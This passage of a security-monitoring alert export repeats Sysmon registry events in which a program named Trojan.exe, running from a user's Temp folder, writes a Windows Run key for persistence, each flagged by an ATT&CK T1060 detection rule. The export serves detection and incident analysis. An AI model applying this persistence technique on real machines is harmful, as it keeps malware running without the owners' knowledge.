HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:17.471493300Z"",""eventRecordID"":""1391"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:17.424\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:17.424"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.810",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:16.408 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:16.410983100Z"",""eventRecordID"":""1390"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:16.408\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:16.408"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.738",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:15.393 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:15.410514500Z"",""eventRecordID"":""1389"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:15.393\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:15.393"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.723",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:14.377 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:14.382829900Z"",""eventRecordID"":""1388"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:14.377\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:14.377"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.675",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:13.361 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:13.388797400Z"",""eventRecordID"":""1387"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:13.361\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:13.361"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.617",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:12.347 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:12.363480000Z"",""eventRecordID"":""1386"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:12.347\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:12.347"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.586",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:11.314 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:11.321567500Z"",""eventRecordID"":""1385"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:11.314\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:11.314"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.493",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:10.286 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:10.287844800Z"",""eventRecordID"":""1381"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:10.286\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:10.286"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.412",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:09.284 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:09.288933200Z"",""eventRecordID"":""1379"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:09.284\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:09.284"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.382",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:08.266 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:08.267672200Z"",""eventRecordID"":""1378"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:08.266\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:08.266"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.161",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:07.264 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:07.266088400Z"",""eventRecordID"":""1377"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:07.264\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:07.264"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.146",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:06.261 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 